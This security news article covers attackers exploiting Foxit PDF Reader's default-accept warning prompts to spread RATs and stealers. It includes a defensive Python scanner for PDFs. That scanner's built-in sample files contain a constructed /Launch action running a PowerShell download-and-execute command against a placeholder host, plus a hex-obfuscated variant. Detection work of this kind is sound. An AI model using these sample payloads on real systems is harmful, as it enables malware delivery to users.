Multiple threat actors are exploiting a design flaw in Foxit PDF Reader to distribute a range of malware families, including Agent Tesla, AsyncRAT, DCRat, NanoCore RAT, NjRAT, Pony, Remcos RAT and XWorm. The technique abuses the reader's own security warnings: their default choices lead unsuspecting users into executing attacker-supplied commands, according to a technical report from Check Point. The same flaw is being used by actors ranging from e-crime operations to state-sponsored espionage groups.
Notably, the far more widely used Adobe Acrobat Reader does not react to these documents at all, which keeps their detection rates low. The problem starts with Foxit's first pop-up, which warns that the document contains features that could be a security risk and asks whether to trust it; the default button is "OK". Clicking "OK" (or simply pressing Enter) brings up a second pop-up announcing that a command is about to be executed, and there too the default, "Open", is the choice that runs it. Accepting both defaults downloads and executes a payload hosted on Discord's content delivery network.
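The two-prompt sequence above is what Foxit shows for a PDF action that runs an external program; that this is the PDF /Launch action (an /OpenAction in the catalog pointing at a dictionary with /S /Launch, whose /F names the program and /P its arguments) is an assumption made here, since the page describes the mechanism only by its pop-ups. As an added example, not code from Check Point or Foxit, the following Python script triages PDFs for that pattern before they reach a Foxit user. It resolves /OpenAction both as an inline dictionary and as an indirect reference, decodes #xx hex escapes in names so that /#4Caunch is still recognised as /Launch, and reports /URI link actions separately because the page notes that embedded hyperlinks are also used for delivery. The three sample PDFs are constructed for the demo, and the URLs in them are placeholders.

```python
import re
from typing import Optional

# --- Constructed sample documents (not samples from the Check Point report) ---

# 1. /OpenAction in the catalog references object 4, a /Launch action that runs
#    cmd.exe with a hypothetical download-and-run command (placeholder URL).
LAUNCH_PDF = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>
endobj
4 0 obj
<< /S /Launch /Win << /F (cmd.exe) /P (/c powershell -c "iwr https://cdn.example.invalid/p.exe -o p.exe; ./p.exe") >> >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

# 2. Same idea, but the action is inlined in the catalog and the names
#    /OpenAction and /Launch are hex-escaped to dodge naive string matching.
OBFUSCATED_PDF = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R /Open#41ction << /S /#4Caunch /Win << /F (cmd) /P (/c calc) >> >> >>
endobj
2 0 obj
<< /Type /Pages /Kids [] /Count 0 >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

# 3. Benign document: no auto-run action, just a link annotation.
BENIGN_PDF = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [] /Count 0 >>
endobj
4 0 obj
<< /Type /Annot /Subtype /Link /A << /S /URI /URI (https://example.invalid/report) >> >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
NAME_RE = re.compile(rb"/([^\s/<>\[\]()]*)")
HEX_RE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize_names(data: bytes) -> bytes:
    """Decode #xx escapes inside PDF name tokens so /#4Caunch compares equal to /Launch.
    This is a heuristic over the raw bytes: a '#xx' inside a string will be decoded
    too, which is harmless for triage purposes."""
    def decode(m):
        return b"/" + HEX_RE.sub(lambda h: bytes([int(h.group(1), 16)]), m.group(1))
    return NAME_RE.sub(decode, data)


def literal(key: bytes, body: bytes) -> Optional[str]:
    """Return the literal-string value of /key in an object body (raw, escapes not decoded)."""
    m = re.search(rb"/" + key + rb"\s*\(([^)]*)\)", body)
    return m.group(1).decode("latin-1") if m else None


def scan_pdf(data: bytes) -> dict:
    """Heuristic triage: does anything run automatically when this PDF is opened?
    Limitation: objects packed in compressed object streams (/ObjStm) are not
    inflated here; a production scanner must decompress them first."""
    norm = normalize_names(data)
    objects = {int(m.group(1)): m.group(3) for m in OBJ_RE.finditer(norm)}

    launch = []  # (object number, program, arguments)
    uris = []
    for num, body in objects.items():
        if re.search(rb"/S\s*/Launch\b", body):
            launch.append((num, literal(b"F", body) or "?", literal(b"P", body) or ""))
        if re.search(rb"/S\s*/URI\b", body):
            uris.append(literal(b"URI", body) or "?")

    # /OpenAction is either an inline dictionary ("<<") or a reference "N G R".
    launch_on_open = False
    for num, body in objects.items():
        m = re.search(rb"/OpenAction\s*(?:(\d+)\s+\d+\s+R|<<)", body)
        if m:
            target = int(m.group(1)) if m.group(1) else num
            launch_on_open |= any(n == target for n, _, _ in launch)

    return {
        "launch_actions": launch,
        "uri_actions": uris,
        "launch_on_open": launch_on_open,
        "has_object_streams": b"/ObjStm" in norm,
        "verdict": "block" if launch_on_open else ("review" if launch else "allow"),
    }


if __name__ == "__main__":
    for name, pdf in [("launch", LAUNCH_PDF), ("obfuscated", OBFUSCATED_PDF), ("benign", BENIGN_PDF)]:
        print(name, scan_pdf(pdf))
```

A Launch action that is not wired to /OpenAction still deserves review, because it can be triggered from a link or form field, so the script distinguishes "block" (runs on open) from "review" (present but not automatic). Real-world samples frequently store the catalog inside an object stream, so the `has_object_streams` flag should be treated as "parse deeper", not as "clean".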
Security researcher Antonis Terefos remarked that the structure of this exploit benefits from flawed logic and typical user behavior, where the default option is the most harmful one. A military-themed PDF identified by Check Point illustrates the chain: when opened, it runs a command that retrieves a downloader, which in turn fetches two executables that collect sensitive data, including documents, images and database files, and send it to a command-and-control (C2) server.
The downloader can also deploy a third-stage payload that captures screenshots of the compromised machine and uploads them to the same C2 server. This focus on data theft suggests an espionage operation, and the activity overlaps with tactics and techniques previously linked to the DoNot Team.
In another instance, the same technique was found in a multi-stage chain that deployed a stealer alongside cryptocurrency miners such as XMRig and lolMiner. Some of the malicious PDFs are reportedly distributed through Facebook, a further example of threat actors using trusted platforms to reach users.
The attack also reaches users through other routes, including hyperlinks embedded in malicious PDFs that lead to further malicious content. Throughout, the operators rely on trusted services such as Discord and GitLab to host their payloads, blending malicious traffic with legitimate use of those platforms and making it harder to block at the network level.
Check Point also identified several .NET- and Python-based PDF builders, some openly available on GitHub, that are used to generate these documents. That the technique keeps working reflects a broader pattern: attacks that hinge on user habits around everyday document handling rather than on a flaw in the reader's code.
Foxit has said it will address the issue in an upcoming release; until then, vigilance is essential, particularly in business environments. In MITRE ATT&CK terms the observed behaviour maps to Initial Access (a phishing attachment), Execution (the user clicking through the prompts) and Command and Control (the callbacks from the later stages); the framework describes techniques, not motives. Practical stop-gaps include inspecting inbound PDFs for embedded launch actions at the mail gateway and restricting outbound access to file-hosting CDNs the organisation does not need. Malware delivered this way exposes gaps in user-awareness programs, where "accept the default" is exactly the habit being exploited, and underlines the need for controls that recognise and mitigate such abuse rather than relying on users to read every prompt.